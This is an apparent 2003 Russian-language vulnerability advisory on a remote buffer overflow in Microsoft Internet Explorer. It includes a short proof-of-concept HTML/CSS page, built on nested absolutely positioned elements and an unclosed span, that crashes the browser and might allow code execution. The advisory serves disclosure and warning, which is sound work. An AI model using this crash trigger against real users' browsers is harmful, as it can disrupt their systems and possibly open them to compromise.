Удаленное переполнение буфера в Microsoft Internet Explorer
| Дата публикации: | 04.10.2003 |
| Всего просмотров: | 1223 |
| Опасность: | Средняя |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: Microsoft Internet Explorer
Описание: Уязвимость обнаружена в Microsoft Internet Explorer. Удаленный атакующий может аварийно завершить работу браузера и, возможно, выполнить произвольный код на уязвимой системе. Удаленный пользователь может сконструировать специально обработанную страницу, содержащую комбинацию HTML и CSS, чтобы аварийно завершить работу Internet Explorer. Возможно уязвимость может использоваться для выполнения произвольного кода. Пример/Эксплоит:
<html>
<body>
<style type="text/css">
#three {
position: absolute;
}
#one #two {
position: absolute;
}
</style>
<div id="one">
In 'one'
<span id="two">
In 'two'
</div>
<div id="three">
In 'three'
</div>
</body>
URL производителя: http://www.microsoft.com Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время. Не заходите на недоверенные Web сайты. Используйте альтернативное программное обеспечение. |